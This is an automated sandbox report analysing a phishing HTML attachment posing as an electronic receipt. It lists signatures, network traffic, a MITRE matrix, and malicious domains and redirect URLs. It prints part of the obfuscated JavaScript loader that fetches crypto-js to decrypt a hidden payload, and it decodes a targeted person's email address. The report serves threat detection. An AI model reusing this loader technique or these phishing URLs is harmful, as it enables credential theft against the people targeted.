Edit tour

Windows Analysis Report
Electronic_Receipt_ATT0001.htm

Overview

General Information

Sample name:	Electronic_Receipt_ATT0001.htm
Analysis ID:	1523714
MD5:	6f9e924102b87ad8368326dce7b61500
SHA1:	f8d81d8e4734a8771d5d55b0f3f102ccb0e8e8ed
SHA256:	65c57e8cd05b4d1ab5070bdb21be8629241cb193d176b3267529a3ff57b4e8da
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected javascript redirector / loader

HTML document with suspicious name

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2016,i,16826850735177625839,11304651080124014247,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://ktqco.eh5j.com/MlKbF/#W#em11bGxpZ2FuQGhhcm1vbnljYXJlcy5jb20=

SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Detected javascript redirector / loader

Source: Electronic_Receipt_ATT0001.htm

HTTP Parser: Low number of body elements: 1

Source: Electronic_Receipt_ATT0001.htm

HTTP Parser: Base64 decoded: zmulligan@harmonycares.com

Source: https://uzerapproved.com/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail

HTTP Parser: var pthunbgfuteijsns = document.createelement("script");pthunbgfuteijsns.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(pthunbgfuteijsns);pthunbgfuteijsns.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoibuxcae8zavmyuxjqaghvbnpsovbacvf0r01xu0lzrk9ooe5sbklozmv1zxvlntu4d1fzcgq2uef4z05xrvn1d1bszjdicwnlrgrcl3dmm1hiq1zovdi4b0nbdgj6r1nwzxpmnmhydxjmtgtna1hlsxjyovrrbxbwzmhesnzubgdbqwzsevy2d3myu1vmrmnhvuvfbe1ywwttqljua1zwadk2swzawvu5t01putc4vhdqsjy2zhj5anlpetj2stf5ahbnvwfqzlvjv1vlrddydghbafrcl1pav0l6vxdbcdd3bkuzqxd2cmfqvm8ybhptak5uaklmahpwbmvpxc9mynbhn2hoc3hwynyyslbgowtfqknlvzh0zmhiuxrrv28zqujnvwi0vxhxv1jtoetqqwtaykzyb25qqlnimdfmmhzntzf3thewaldecghoufjgdwzirvzvrnd4mgfcl2l0qwnhzexyytljt04xa2irsel1bxzhofd5cevdwujosnvsrdllavfzmtvtslhingfpnudey1q1n21mu0ppdlo0m2dqcxr6znhiz3krnytobww0eepdwjfzvdfkbghtvkm2dlvdaunnumtnm25vwwvhquhtewy0mjvqbnz3qwfpmwzwcdnry1c3m2hhddr3bkpom1d4rzz0sfk0yu1oa0hxufezwgrrqlwvrfb1wvn0aepkdgnht09cl2pmstlsdtrhzfjxod...

Source: Electronic_Receipt_ATT0001.htm	HTTP Parser: No favicon
Source: https://ktqco.eh5j.com/MlKbF/#W#em11bGxpZ2FuQGhhcm1vbnljYXJlcy5jb20=	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49768 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.4:61996 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 69.49.245.172 69.49.245.172
Source: Joe Sandbox View	IP Address: 69.49.245.172 69.49.245.172
Source: Joe Sandbox View	IP Address: 192.0.78.26 192.0.78.26
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail HTTP/1.1Host: uzerapproved.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail HTTP/1.1Host: uzerapproved.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?https://KtqCO.eh5j.com/MlKbF/ HTTP/1.1Host: href.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /MlKbF/ HTTP/1.1Host: ktqco.eh5j.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Host: ktqco.eh5j.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ktqco.eh5j.com/MlKbF/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: ktqco.eh5j.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ktqco.eh5j.com/cdn-cgi/styles/cf.errors.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ktqco.eh5j.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ktqco.eh5j.com/MlKbF/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: ktqco.eh5j.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ktqco.eh5j.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bgEgzuWRKtWggtf&MD=VvOF+Lpr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bgEgzuWRKtWggtf&MD=VvOF+Lpr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: uzerapproved.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: href.li
Source: global traffic	DNS traffic detected: DNS query: ktqco.eh5j.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_127.2.dr	String found in binary or memory: https://KtqCO.eh5j.com/MlKbF/
Source: chromecache_137.2.dr, chromecache_133.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_135.2.dr, chromecache_128.2.dr, chromecache_129.2.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49768 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Electronic_Receipt_ATT0001.htm

Initial sample: receipt

Source: classification engine

Classification label: mal56.phis.winHTM@31/18@18/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2016,i,16826850735177625839,11304651080124014247,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2016,i,16826850735177625839,11304651080124014247,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://ktqco.eh5j.com/MlKbF/#W#em11bGxpZ2FuQGhhcm1vbnljYXJlcy5jb20=	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdnjs.cloudflare.com	104.17.25.14	true	false	unknown
ktqco.eh5j.com	172.67.183.69	true	false	unknown
www.google.com	142.250.184.196	true	false	unknown
uzerapproved.com	69.49.245.172	true	false	unknown
href.li	192.0.78.26	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://href.li/?https://KtqCO.eh5j.com/MlKbF/	false		unknown
https://uzerapproved.com/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail	false		unknown
https://ktqco.eh5j.com/favicon.ico	false		unknown
https://ktqco.eh5j.com/cdn-cgi/images/icon-exclamation.png?1376755637	false		unknown
https://ktqco.eh5j.com/MlKbF/	false		unknown
https://ktqco.eh5j.com/cdn-cgi/styles/cf.errors.css	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://KtqCO.eh5j.com/MlKbF/	chromecache_127.2.dr	false		unknown
https://www.cloudflare.com/5xx-error-landing	chromecache_135.2.dr, chromecache_128.2.dr, chromecache_129.2.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
172.67.183.69	ktqco.eh5j.com	United States	13335	CLOUDFLARENETUS	false
69.49.245.172	uzerapproved.com	United States	46606	UNIFIEDLAYER-AS-1US	false
216.58.206.68	unknown	United States	15169	GOOGLEUS	false
192.0.78.26	href.li	United States	2635	AUTOMATTICUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.8
192.168.2.17
192.168.2.4
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523714
Start date and time:	2024-10-02 00:18:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Electronic_Receipt_ATT0001.htm
Detection:	MAL
Classification:	mal56.phis.winHTM@31/18@18/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.74.195, 142.250.186.142, 64.233.167.84, 34.104.35.123, 172.217.23.106, 216.58.212.138, 172.217.18.10, 172.217.16.202, 142.250.184.234, 142.250.185.170, 142.250.185.202, 142.250.186.106, 142.250.74.202, 142.250.185.138, 142.250.186.138, 142.250.185.106, 172.217.18.106, 142.250.185.74, 216.58.206.74, 142.250.185.234, 199.232.210.172, 192.229.221.95, 142.250.186.35, 142.250.186.78
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
